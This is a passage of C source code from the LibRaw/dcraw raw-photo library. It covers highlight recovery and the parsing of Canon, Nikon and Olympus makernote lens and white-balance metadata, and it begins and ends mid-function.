#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_MEDIAN_FILTER,pass-1,med_passes);
#endif
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr,_("Median filter pass %d...\n"), pass);
#endif
for (c=0; c < 3; c+=2) {
for (pix = image; pix < image+width*height; pix++)
pix[0][3] = pix[0][c];
for (pix = image+width; pix < image+width*(height-1); pix++) {
if ((pix-image+1) % width < 2) continue;
for (k=0, i = -width; i <= width; i += width)
for (j = i-1; j <= i+1; j++)
med[k++] = pix[j][3] - pix[j][1];
for (i=0; i < sizeof opt; i+=2)
if (med[opt[i]] > med[opt[i+1]])
SWAP (med[opt[i]] , med[opt[i+1]]);
pix[0][c] = CLIP(med[4] + pix[0][1]);
}
}
}
}
void CLASS blend_highlights()
{
int clip=INT_MAX, row, col, c, i, j;
static const float trans[2][4][4] =
{ { { 1,1,1 }, { 1.7320508,-1.7320508,0 }, { -1,-1,2 } },
{ { 1,1,1,1 }, { 1,-1,1,-1 }, { 1,1,-1,-1 }, { 1,-1,-1,1 } } };
static const float itrans[2][4][4] =
{ { { 1,0.8660254,-0.5 }, { 1,-0.8660254,-0.5 }, { 1,0,1 } },
{ { 1,1,1,1 }, { 1,-1,1,-1 }, { 1,1,-1,-1 }, { 1,-1,-1,1 } } };
float cam[2][4], lab[2][4], sum[2], chratio;
if ((unsigned) (colors-3) > 1) return;
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("Blending highlights...\n"));
#endif
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_HIGHLIGHTS,0,2);
#endif
FORCC if (clip > (i = 65535*pre_mul[c])) clip = i;
for (row=0; row < height; row++)
for (col=0; col < width; col++) {
FORCC if (image[row*width+col][c] > clip) break;
if (c == colors) continue;
FORCC {
cam[0][c] = image[row*width+col][c];
cam[1][c] = MIN(cam[0][c],clip);
}
for (i=0; i < 2; i++) {
FORCC for (lab[i][c]=j=0; j < colors; j++)
lab[i][c] += trans[colors-3][c][j] * cam[i][j];
for (sum[i]=0,c=1; c < colors; c++)
sum[i] += SQR(lab[i][c]);
}
chratio = sqrt(sum[1]/sum[0]);
for (c=1; c < colors; c++)
lab[0][c] *= chratio;
FORCC for (cam[0][c]=j=0; j < colors; j++)
cam[0][c] += itrans[colors-3][c][j] * lab[0][j];
FORCC image[row*width+col][c] = cam[0][c] / colors;
}
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_HIGHLIGHTS,1,2);
#endif
}
#define SCALE (4 >> shrink)
void CLASS recover_highlights()
{
float *map, sum, wgt, grow;
int hsat[4], count, spread, change, val, i;
unsigned high, wide, mrow, mcol, row, col, kc, c, d, y, x;
ushort *pixel;
static const signed char dir[8][2] =
{ {-1,-1}, {-1,0}, {-1,1}, {0,1}, {1,1}, {1,0}, {1,-1}, {0,-1} };
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("Rebuilding highlights...\n"));
#endif
grow = pow (2.0, 4-highlight);
FORCC hsat[c] = 32000 * pre_mul[c];
for (kc=0, c=1; c < colors; c++)
if (pre_mul[kc] < pre_mul[c]) kc = c;
high = height / SCALE;
wide = width / SCALE;
map = (float *) calloc (high, wide*sizeof *map);
merror (map, "recover_highlights()");
FORCC if (c != kc) {
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_HIGHLIGHTS,c-1,colors-1);
#endif
memset (map, 0, high*wide*sizeof *map);
for (mrow=0; mrow < high; mrow++)
for (mcol=0; mcol < wide; mcol++) {
sum = wgt = count = 0;
for (row = mrow*SCALE; row < (mrow+1)*SCALE; row++)
for (col = mcol*SCALE; col < (mcol+1)*SCALE; col++) {
pixel = image[row*width+col];
if (pixel[c] / hsat[c] == 1 && pixel[kc] > 24000) {
sum += pixel[c];
wgt += pixel[kc];
count++;
}
}
if (count == SCALE*SCALE)
map[mrow*wide+mcol] = sum / wgt;
}
for (spread = 32/grow; spread--; ) {
for (mrow=0; mrow < high; mrow++)
for (mcol=0; mcol < wide; mcol++) {
if (map[mrow*wide+mcol]) continue;
sum = count = 0;
for (d=0; d < 8; d++) {
y = mrow + dir[d][0];
x = mcol + dir[d][1];
if (y < high && x < wide && map[y*wide+x] > 0) {
sum += (1 + (d & 1)) * map[y*wide+x];
count += 1 + (d & 1);
}
}
if (count > 3)
map[mrow*wide+mcol] = - (sum+grow) / (count+grow);
}
for (change=i=0; i < high*wide; i++)
if (map[i] < 0) {
map[i] = -map[i];
change = 1;
}
if (!change) break;
}
for (i=0; i < high*wide; i++)
if (map[i] == 0) map[i] = 1;
for (mrow=0; mrow < high; mrow++)
for (mcol=0; mcol < wide; mcol++) {
for (row = mrow*SCALE; row < (mrow+1)*SCALE; row++)
for (col = mcol*SCALE; col < (mcol+1)*SCALE; col++) {
pixel = image[row*width+col];
if (pixel[c] / hsat[c] > 1) {
val = pixel[kc] * map[mrow*wide+mcol];
if (pixel[c] < val) pixel[c] = CLIP(val);
}
}
}
}
free (map);
}
#undef SCALE
void CLASS tiff_get (unsigned base,
unsigned *tag, unsigned *type, unsigned *len, unsigned *save)
{
*tag = get2();
*type = get2();
*len = get4();
*save = ftell(ifp) + 4;
if (*len * ("11124811248484"[*type < 14 ? *type:0]-'0') > 4)
fseek (ifp, get4()+base, SEEK_SET);
}
void CLASS parse_thumb_note (int base, unsigned toff, unsigned tlen)
{
unsigned entries, tag, type, len, save;
entries = get2();
while (entries--) {
tiff_get (base, &tag, &type, &len, &save);
if (tag == toff) thumb_offset = get4()+base;
if (tag == tlen) thumb_length = get4();
fseek (ifp, save, SEEK_SET);
}
}
//@end COMMON
int CLASS parse_tiff_ifd (int base);
//@out COMMON
static float powf_lim(float a, float b, float limup)
{
return (b>limup || b < -limup)?0.f:powf(a,b);
}
static float libraw_powf64(float a, float b)
{
return powf_lim(a,b,64.f);
}
#ifdef LIBRAW_LIBRARY_BUILD
static float my_roundf(float x) {
float t;
if (x >= 0.0) {
t = ceilf(x);
if (t - x > 0.5) t -= 1.0;
return t;
} else {
t = ceilf(-x);
if (t + x > 0.5) t -= 1.0;
return -t;
}
}
static float _CanonConvertAperture(ushort in)
{
if ((in == (ushort)0xffe0) || (in == (ushort)0x7fff)) return 0.0f;
return libraw_powf64(2.0, in/64.0);
}
static float _CanonConvertEV (short in)
{
short EV, Sign, Frac;
float Frac_f;
EV = in;
if (EV < 0) {
EV = -EV;
Sign = -1;
} else {
Sign = 1;
}
Frac = EV & 0x1f;
EV -= Frac; // remove fraction
if (Frac == 0x0c) { // convert 1/3 and 2/3 codes
Frac_f = 32.0f / 3.0f;
} else if (Frac == 0x14) {
Frac_f = 64.0f / 3.0f;
} else Frac_f = (float) Frac;
return ((float)Sign * ((float)EV + Frac_f))/32.0f;
}
void CLASS setCanonBodyFeatures (unsigned id)
{
imgdata.lens.makernotes.CamID = id;
if (
(id == 0x80000001) || // 1D
(id == 0x80000174) || // 1D2
(id == 0x80000232) || // 1D2N
(id == 0x80000169) || // 1D3
(id == 0x80000281) // 1D4
)
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_APSH;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Canon_EF;
}
else
if (
(id == 0x80000167) || // 1Ds
(id == 0x80000188) || // 1Ds2
(id == 0x80000215) || // 1Ds3
(id == 0x80000269) || // 1DX
(id == 0x80000328) || // 1DX2
(id == 0x80000324) || // 1DC
(id == 0x80000213) || // 5D
(id == 0x80000218) || // 5D2
(id == 0x80000285) || // 5D3
(id == 0x80000349) || // 5D4
(id == 0x80000382) || // 5DS
(id == 0x80000401) || // 5DS R
(id == 0x80000302) // 6D
)
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_FF;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Canon_EF;
}
else
if (
(id == 0x80000331) || // M
(id == 0x80000355) || // M2
(id == 0x80000374) || // M3
(id == 0x80000384) || // M10
(id == 0x80000394) // M5
)
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_APSC;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Canon_EF_M;
}
else
if (
(id == 0x01140000) || // D30
(id == 0x01668000) || // D60
(id > 0x80000000)
)
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_APSC;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Canon_EF;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Unknown;
}
else
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
}
return;
}
void CLASS processCanonCameraInfo (unsigned id, uchar *CameraInfo, unsigned maxlen)
{
ushort iCanonLensID = 0, iCanonMaxFocal = 0, iCanonMinFocal = 0, iCanonLens = 0, iCanonCurFocal = 0, iCanonFocalType = 0;
if(maxlen<16) return; // too short, so broken
CameraInfo[0] = 0;
CameraInfo[1] = 0;
switch (id) {
case 0x80000001: // 1D
case 0x80000167: // 1DS
iCanonCurFocal = 10;
iCanonLensID = 13;
iCanonMinFocal = 14;
iCanonMaxFocal = 16;
if (!imgdata.lens.makernotes.CurFocal)
imgdata.lens.makernotes.CurFocal = sget2(CameraInfo + iCanonCurFocal);
if (!imgdata.lens.makernotes.MinFocal)
imgdata.lens.makernotes.MinFocal = sget2(CameraInfo + iCanonMinFocal);
if (!imgdata.lens.makernotes.MaxFocal)
imgdata.lens.makernotes.MaxFocal = sget2(CameraInfo + iCanonMaxFocal);
break;
case 0x80000174: // 1DMkII
case 0x80000188: // 1DsMkII
iCanonCurFocal = 9;
iCanonLensID = 12;
iCanonMinFocal = 17;
iCanonMaxFocal = 19;
iCanonFocalType = 45;
break;
case 0x80000232: // 1DMkII N
iCanonCurFocal = 9;
iCanonLensID = 12;
iCanonMinFocal = 17;
iCanonMaxFocal = 19;
break;
case 0x80000169: // 1DMkIII
case 0x80000215: // 1DsMkIII
iCanonCurFocal = 29;
iCanonLensID = 273;
iCanonMinFocal = 275;
iCanonMaxFocal = 277;
break;
case 0x80000281: // 1DMkIV
iCanonCurFocal = 30;
iCanonLensID = 335;
iCanonMinFocal = 337;
iCanonMaxFocal = 339;
break;
case 0x80000269: // 1D X
iCanonCurFocal = 35;
iCanonLensID = 423;
iCanonMinFocal = 425;
iCanonMaxFocal = 427;
break;
case 0x80000213: // 5D
iCanonCurFocal = 40;
if (!sget2Rev(CameraInfo + 12)) iCanonLensID = 151;
else iCanonLensID = 12;
iCanonMinFocal = 147;
iCanonMaxFocal = 149;
break;
case 0x80000218: // 5DMkII
iCanonCurFocal = 30;
iCanonLensID = 230;
iCanonMinFocal = 232;
iCanonMaxFocal = 234;
break;
case 0x80000285: // 5DMkIII
iCanonCurFocal = 35;
iCanonLensID = 339;
iCanonMinFocal = 341;
iCanonMaxFocal = 343;
break;
case 0x80000302: // 6D
iCanonCurFocal = 35;
iCanonLensID = 353;
iCanonMinFocal = 355;
iCanonMaxFocal = 357;
break;
case 0x80000250: // 7D
iCanonCurFocal = 30;
iCanonLensID = 274;
iCanonMinFocal = 276;
iCanonMaxFocal = 278;
break;
case 0x80000190: // 40D
iCanonCurFocal = 29;
iCanonLensID = 214;
iCanonMinFocal = 216;
iCanonMaxFocal = 218;
iCanonLens = 2347;
break;
case 0x80000261: // 50D
iCanonCurFocal = 30;
iCanonLensID = 234;
iCanonMinFocal = 236;
iCanonMaxFocal = 238;
break;
case 0x80000287: // 60D
iCanonCurFocal = 30;
iCanonLensID = 232;
iCanonMinFocal = 234;
iCanonMaxFocal = 236;
break;
case 0x80000325: // 70D
iCanonCurFocal = 35;
iCanonLensID = 358;
iCanonMinFocal = 360;
iCanonMaxFocal = 362;
break;
case 0x80000176: // 450D
iCanonCurFocal = 29;
iCanonLensID = 222;
iCanonLens = 2355;
break;
case 0x80000252: // 500D
iCanonCurFocal = 30;
iCanonLensID = 246;
iCanonMinFocal = 248;
iCanonMaxFocal = 250;
break;
case 0x80000270: // 550D
iCanonCurFocal = 30;
iCanonLensID = 255;
iCanonMinFocal = 257;
iCanonMaxFocal = 259;
break;
case 0x80000286: // 600D
case 0x80000288: // 1100D
iCanonCurFocal = 30;
iCanonLensID = 234;
iCanonMinFocal = 236;
iCanonMaxFocal = 238;
break;
case 0x80000301: // 650D
case 0x80000326: // 700D
iCanonCurFocal = 35;
iCanonLensID = 295;
iCanonMinFocal = 297;
iCanonMaxFocal = 299;
break;
case 0x80000254: // 1000D
iCanonCurFocal = 29;
iCanonLensID = 226;
iCanonMinFocal = 228;
iCanonMaxFocal = 230;
iCanonLens = 2359;
break;
}
if (iCanonFocalType)
{
if(iCanonFocalType>=maxlen) return; // broken;
imgdata.lens.makernotes.FocalType = CameraInfo[iCanonFocalType];
if (!imgdata.lens.makernotes.FocalType) // zero means 'fixed' here, replacing with standard '1'
imgdata.lens.makernotes.FocalType = 1;
}
if (!imgdata.lens.makernotes.CurFocal)
{
if(iCanonCurFocal>=maxlen) return; // broken;
imgdata.lens.makernotes.CurFocal = sget2Rev(CameraInfo + iCanonCurFocal);
}
if (!imgdata.lens.makernotes.LensID)
{
if(iCanonLensID>=maxlen) return; // broken;
imgdata.lens.makernotes.LensID = sget2Rev(CameraInfo + iCanonLensID);
}
if (!imgdata.lens.makernotes.MinFocal)
{
if(iCanonMinFocal>=maxlen) return; // broken;
imgdata.lens.makernotes.MinFocal = sget2Rev(CameraInfo + iCanonMinFocal);
}
if (!imgdata.lens.makernotes.MaxFocal)
{
if(iCanonMaxFocal>=maxlen) return; // broken;
imgdata.lens.makernotes.MaxFocal = sget2Rev(CameraInfo + iCanonMaxFocal);
}
if (!imgdata.lens.makernotes.Lens[0] && iCanonLens) {
if(iCanonLens+64>=maxlen) return; // broken;
if (CameraInfo[iCanonLens] < 65) // non-Canon lens
{
memcpy(imgdata.lens.makernotes.Lens, CameraInfo + iCanonLens, 64);
}
else if (!strncmp((char *)CameraInfo + iCanonLens, "EF-S", 4))
{
memcpy(imgdata.lens.makernotes.Lens, "EF-S ", 5);
memcpy(imgdata.lens.makernotes.LensFeatures_pre, "EF-E", 4);
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF_S;
memcpy(imgdata.lens.makernotes.Lens + 5, CameraInfo + iCanonLens + 4, 60);
}
else if (!strncmp((char *)CameraInfo + iCanonLens, "TS-E", 4)) {
memcpy(imgdata.lens.makernotes.Lens, "TS-E ", 5);
memcpy(imgdata.lens.makernotes.LensFeatures_pre, "TS-E", 4);
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
memcpy(imgdata.lens.makernotes.Lens + 5, CameraInfo + iCanonLens + 4, 60);
}
else if (!strncmp((char *)CameraInfo + iCanonLens, "MP-E", 4)) {
memcpy(imgdata.lens.makernotes.Lens, "MP-E ", 5);
memcpy(imgdata.lens.makernotes.LensFeatures_pre, "MP-E", 4);
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
memcpy(imgdata.lens.makernotes.Lens + 5, CameraInfo + iCanonLens + 4, 60);
}
else if (!strncmp((char *)CameraInfo + iCanonLens, "EF-M", 4)) {
memcpy(imgdata.lens.makernotes.Lens, "EF-M ", 5);
memcpy(imgdata.lens.makernotes.LensFeatures_pre, "EF-M", 4);
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF_M;
memcpy(imgdata.lens.makernotes.Lens + 5, CameraInfo + iCanonLens + 4, 60);
}
else {
memcpy(imgdata.lens.makernotes.Lens, CameraInfo + iCanonLens, 2);
memcpy(imgdata.lens.makernotes.LensFeatures_pre, "EF", 2);
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
imgdata.lens.makernotes.Lens[2] = 32;
memcpy(imgdata.lens.makernotes.Lens + 3, CameraInfo + iCanonLens + 2, 62);
}
}
return;
}
void CLASS Canon_CameraSettings ()
{
fseek(ifp, 10, SEEK_CUR);
imgdata.shootinginfo.DriveMode = get2(); get2();
imgdata.shootinginfo.FocusMode = get2();
fseek(ifp, 18, SEEK_CUR);
imgdata.shootinginfo.MeteringMode = get2(); get2();
imgdata.shootinginfo.AFPoint = get2();
imgdata.shootinginfo.ExposureMode = get2(); get2();
imgdata.lens.makernotes.LensID = get2();
imgdata.lens.makernotes.MaxFocal = get2();
imgdata.lens.makernotes.MinFocal = get2();
imgdata.lens.makernotes.CanonFocalUnits = get2();
if (imgdata.lens.makernotes.CanonFocalUnits > 1)
{
imgdata.lens.makernotes.MaxFocal /= (float)imgdata.lens.makernotes.CanonFocalUnits;
imgdata.lens.makernotes.MinFocal /= (float)imgdata.lens.makernotes.CanonFocalUnits;
}
imgdata.lens.makernotes.MaxAp = _CanonConvertAperture(get2());
imgdata.lens.makernotes.MinAp = _CanonConvertAperture(get2());
fseek(ifp, 12, SEEK_CUR);
imgdata.shootinginfo.ImageStabilization = get2();
}
void CLASS Canon_WBpresets (int skip1, int skip2)
{
int c;
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c ^ (c >> 1)] = get2();
if (skip1) fseek(ifp, skip1, SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][c ^ (c >> 1)] = get2();
if (skip1) fseek(ifp, skip1, SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][c ^ (c >> 1)] = get2();
if (skip1) fseek(ifp, skip1, SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c ^ (c >> 1)] = get2();
if (skip1) fseek(ifp, skip1, SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][c ^ (c >> 1)] = get2();
if (skip2) fseek(ifp, skip2, SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][c ^ (c >> 1)] = get2();
return;
}
void CLASS Canon_WBCTpresets (short WBCTversion)
{
if (WBCTversion == 0)
for (int i=0; i<15; i++)// tint, as shot R, as shot B, CСT
{
imgdata.color.WBCT_Coeffs[i][2] = imgdata.color.WBCT_Coeffs[i][4] = 1.0f;
fseek (ifp, 2, SEEK_CUR);
imgdata.color.WBCT_Coeffs[i][1] = 1024.0f /fMAX(get2(),1.f) ;
imgdata.color.WBCT_Coeffs[i][3] = 1024.0f /fMAX(get2(),1.f);
imgdata.color.WBCT_Coeffs[i][0] = get2();
}
else if (WBCTversion == 1)
for (int i=0; i<15; i++) // as shot R, as shot B, tint, CСT
{
imgdata.color.WBCT_Coeffs[i][2] = imgdata.color.WBCT_Coeffs[i][4] = 1.0f;
imgdata.color.WBCT_Coeffs[i][1] = 1024.0f / fMAX(get2(),1.f);
imgdata.color.WBCT_Coeffs[i][3] = 1024.0f / fMAX(get2(),1.f);
fseek (ifp, 2, SEEK_CUR);
imgdata.color.WBCT_Coeffs[i][0] = get2();
}
else if ((WBCTversion == 2) &&
((unique_id == 0x80000374) || // M3
(unique_id == 0x80000384) || // M10
(unique_id == 0x80000394) || // M5
(unique_id == 0x03970000))) // G7 X Mark II
for (int i=0; i<15; i++) // tint, offset, as shot R, as shot B, CСT
{
fseek (ifp, 2, SEEK_CUR);
fseek (ifp, 2, SEEK_CUR);
imgdata.color.WBCT_Coeffs[i][2] = imgdata.color.WBCT_Coeffs[i][4] = 1.0f;
imgdata.color.WBCT_Coeffs[i][1] = 1024.0f / fMAX(1.f,get2());
imgdata.color.WBCT_Coeffs[i][3] = 1024.0f / fMAX(1.f,get2());
imgdata.color.WBCT_Coeffs[i][0] = get2();
}
else if ((WBCTversion == 2) &&
((unique_id == 0x03950000) || (unique_id == 0x03930000))) // G5 X, G9 X
for (int i=0; i<15; i++) // tint, offset, as shot R, as shot B, CСT
{
fseek (ifp, 2, SEEK_CUR);
fseek (ifp, 2, SEEK_CUR);
imgdata.color.WBCT_Coeffs[i][2] = imgdata.color.WBCT_Coeffs[i][4] = 1.0f;
imgdata.color.WBCT_Coeffs[i][1] = (float)get2() / 512.0f;
imgdata.color.WBCT_Coeffs[i][3] = (float)get2() / 512.0f;
imgdata.color.WBCT_Coeffs[i][0] = get2();
}
return;
}
void CLASS processNikonLensData (uchar *LensData, unsigned len)
{
ushort i;
if (!(imgdata.lens.nikon.NikonLensType & 0x01))
{
imgdata.lens.makernotes.LensFeatures_pre[0] = 'A';
imgdata.lens.makernotes.LensFeatures_pre[1] = 'F';
}
else
{
imgdata.lens.makernotes.LensFeatures_pre[0] = 'M';
imgdata.lens.makernotes.LensFeatures_pre[1] = 'F';
}
if (imgdata.lens.nikon.NikonLensType & 0x02)
{
if (imgdata.lens.nikon.NikonLensType & 0x04)
imgdata.lens.makernotes.LensFeatures_suf[0] = 'G';
else
imgdata.lens.makernotes.LensFeatures_suf[0] = 'D';
imgdata.lens.makernotes.LensFeatures_suf[1] = ' ';
}
if (imgdata.lens.nikon.NikonLensType & 0x08)
{
imgdata.lens.makernotes.LensFeatures_suf[2] = 'V';
imgdata.lens.makernotes.LensFeatures_suf[3] = 'R';
}
if (imgdata.lens.nikon.NikonLensType & 0x10)
{
imgdata.lens.makernotes.LensMount = imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Nikon_CX;
imgdata.lens.makernotes.CameraFormat = imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_1INCH;
}
else
imgdata.lens.makernotes.LensMount = imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Nikon_F;
if (imgdata.lens.nikon.NikonLensType & 0x20)
{
strcpy(imgdata.lens.makernotes.Adapter, "FT-1");
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Nikon_F;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Nikon_CX;
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_1INCH;
}
imgdata.lens.nikon.NikonLensType = imgdata.lens.nikon.NikonLensType & 0xdf;
if (len < 20) {
switch (len) {
case 9:
i = 2;
break;
case 15:
i = 7;
break;
case 16:
i = 8;
break;
}
imgdata.lens.nikon.NikonLensIDNumber = LensData[i];
imgdata.lens.nikon.NikonLensFStops = LensData[i + 1];
imgdata.lens.makernotes.LensFStops = (float)imgdata.lens.nikon.NikonLensFStops /12.0f;
if (fabsf(imgdata.lens.makernotes.MinFocal) < 1.1f)
{
if ((imgdata.lens.nikon.NikonLensType ^ (uchar)0x01) || LensData[i + 2])
imgdata.lens.makernotes.MinFocal = 5.0f * libraw_powf64(2.0f, (float)LensData[i + 2] / 24.0f);
if ((imgdata.lens.nikon.NikonLensType ^ (uchar)0x01) || LensData[i + 3])
imgdata.lens.makernotes.MaxFocal = 5.0f * libraw_powf64(2.0f, (float)LensData[i + 3] / 24.0f);
if ((imgdata.lens.nikon.NikonLensType ^ (uchar)0x01) || LensData[i + 4])
imgdata.lens.makernotes.MaxAp4MinFocal = libraw_powf64(2.0f, (float)LensData[i + 4] / 24.0f);
if ((imgdata.lens.nikon.NikonLensType ^ (uchar)0x01) || LensData[i + 5])
imgdata.lens.makernotes.MaxAp4MaxFocal = libraw_powf64(2.0f, (float)LensData[i + 5] / 24.0f);
}
imgdata.lens.nikon.NikonMCUVersion = LensData[i + 6];
if (i != 2)
{
if ((LensData[i - 1]) &&
(fabsf(imgdata.lens.makernotes.CurFocal) < 1.1f))
imgdata.lens.makernotes.CurFocal = 5.0f * libraw_powf64(2.0f, (float)LensData[i - 1] / 24.0f);
if (LensData[i + 7]) imgdata.lens.nikon.NikonEffectiveMaxAp = libraw_powf64(2.0f, (float)LensData[i + 7] / 24.0f);
}
imgdata.lens.makernotes.LensID =
(unsigned long long) LensData[i] << 56 |
(unsigned long long) LensData[i + 1] << 48 |
(unsigned long long) LensData[i + 2] << 40 |
(unsigned long long) LensData[i + 3] << 32 |
(unsigned long long) LensData[i + 4] << 24 |
(unsigned long long) LensData[i + 5] << 16 |
(unsigned long long) LensData[i + 6] << 8 |
(unsigned long long) imgdata.lens.nikon.NikonLensType;
}
else if ((len == 459) || (len == 590))
{
memcpy(imgdata.lens.makernotes.Lens, LensData + 390, 64);
}
else if (len == 509)
{
memcpy(imgdata.lens.makernotes.Lens, LensData + 391, 64);
}
else if (len == 879)
{
memcpy(imgdata.lens.makernotes.Lens, LensData + 680, 64);
}
return;
}
void CLASS setOlympusBodyFeatures (unsigned long long id)
{
imgdata.lens.makernotes.CamID = id;
if ((id == 0x4434303430ULL) || // E-1
(id == 0x4434303431ULL) || // E-300
((id & 0x00ffff0000ULL) == 0x0030300000ULL))
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_FT;
if ((id == 0x4434303430ULL) || // E-1
(id == 0x4434303431ULL) || // E-330
((id >= 0x5330303033ULL) && (id <= 0x5330303138ULL)) || // E-330 to E-520
(id == 0x5330303233ULL) || // E-620
(id == 0x5330303239ULL) || // E-450
(id == 0x5330303330ULL) || // E-600
(id == 0x5330303333ULL)) // E-5
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FT;
}
else
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_mFT;
}
}
else
{
imgdata.lens.makernotes.LensMount =
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
return;
}
void CLASS parseCanonMakernotes (unsigned tag, unsigned type, unsigned len) {
if (tag == 0x0001) Canon_CameraSettings();
else if (tag == 0x0002) // focal length
{
imgdata.lens.makernotes.FocalType = get2();
imgdata.lens.makernotes.CurFocal = get2();
if (imgdata.lens.makernotes.CanonFocalUnits > 1)
{
imgdata.lens.makernotes.CurFocal /= (float)imgdata.lens.makernotes.CanonFocalUnits;
}
}
else if (tag == 0x0004) // shot info
{
short tempAp;
fseek(ifp, 30, SEEK_CUR);
imgdata.other.FlashEC = _CanonConvertEV((signed short)get2());
fseek(ifp, 8-32, SEEK_CUR);
if ((tempAp = get2()) != 0x7fff)
imgdata.lens.makernotes.CurAp = _CanonConvertAperture(tempAp);
if (imgdata.lens.makernotes.CurAp < 0.7f)
{
fseek(ifp, 32, SEEK_CUR);
imgdata.lens.makernotes.CurAp = _CanonConvertAperture(get2());
}
if (!aperture) aperture = imgdata.lens.makernotes.CurAp;
}
else if (tag == 0x0095 && // lens model tag
!imgdata.lens.makernotes.Lens[0])
{
fread(imgdata.lens.makernotes.Lens, 2, 1, ifp);
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
if (imgdata.lens.makernotes.Lens[0] < 65) // non-Canon lens
fread(imgdata.lens.makernotes.Lens + 2, 62, 1, ifp);
else
{
char efs[2];
imgdata.lens.makernotes.LensFeatures_pre[0] = imgdata.lens.makernotes.Lens[0];
imgdata.lens.makernotes.LensFeatures_pre[1] = imgdata.lens.makernotes.Lens[1];
fread(efs, 2, 1, ifp);
if (efs[0] == 45 && (efs[1] == 83 || efs[1] == 69 || efs[1] == 77))
{ // "EF-S, TS-E, MP-E, EF-M" lenses
imgdata.lens.makernotes.Lens[2] = imgdata.lens.makernotes.LensFeatures_pre[2] = efs[0];
imgdata.lens.makernotes.Lens[3] = imgdata.lens.makernotes.LensFeatures_pre[3] = efs[1];
imgdata.lens.makernotes.Lens[4] = 32;
if (efs[1] == 83)
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF_S;
imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_APSC;
}
else if (efs[1] == 77)
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF_M;
}
}
else
{ // "EF" lenses
imgdata.lens.makernotes.Lens[2] = 32;
imgdata.lens.makernotes.Lens[3] = efs[0];
imgdata.lens.makernotes.Lens[4] = efs[1];
}
fread(imgdata.lens.makernotes.Lens + 5, 58, 1, ifp);
}
}
else if (tag == 0x00a9)
{
long int save1 = ftell(ifp);
fseek (ifp, save1+(0x5<<1), SEEK_SET);
Canon_WBpresets(0,0);
fseek (ifp, save1, SEEK_SET);
}
else if (tag == 0x00e0) // sensor info
{
imgdata.makernotes.canon.SensorWidth = (get2(),get2());
imgdata.makernotes.canon.SensorHeight = get2();
imgdata.makernotes.canon.SensorLeftBorder = (get2(),get2(),get2());
imgdata.makernotes.canon.SensorTopBorder = get2();
imgdata.makernotes.canon.SensorRightBorder = get2();
imgdata.makernotes.canon.SensorBottomBorder = get2();
imgdata.makernotes.canon.BlackMaskLeftBorder = get2();
imgdata.makernotes.canon.BlackMaskTopBorder = get2();
imgdata.makernotes.canon.BlackMaskRightBorder = get2();
imgdata.makernotes.canon.BlackMaskBottomBorder = get2();
}
else if (tag == 0x4001 && len > 500)
{
int c;
long int save1 = ftell(ifp);
switch (len)
{
case 582:
imgdata.makernotes.canon.CanonColorDataVer = 1; // 20D / 350D
{
fseek (ifp, save1+(0x23<<1), SEEK_SET);
Canon_WBpresets(2,2);
fseek (ifp, save1+(0x4b<<1), SEEK_SET);
Canon_WBCTpresets (1); // ABCT
}
break;
case 653:
imgdata.makernotes.canon.CanonColorDataVer = 2; // 1Dmk2 / 1DsMK2
{
fseek (ifp, save1+(0x27<<1), SEEK_SET);
Canon_WBpresets(2,12);
fseek (ifp, save1+(0xa4<<1), SEEK_SET);
Canon_WBCTpresets (1); // ABCT
}
break;
case 796:
imgdata.makernotes.canon.CanonColorDataVer = 3; // 1DmkIIN / 5D / 30D / 400D
imgdata.makernotes.canon.CanonColorDataSubVer = get2();
{
fseek (ifp, save1+(0x4e<<1), SEEK_SET);
Canon_WBpresets(2,12);
fseek (ifp, save1+(0x85<<1), SEEK_SET);
Canon_WBCTpresets (0); // BCAT
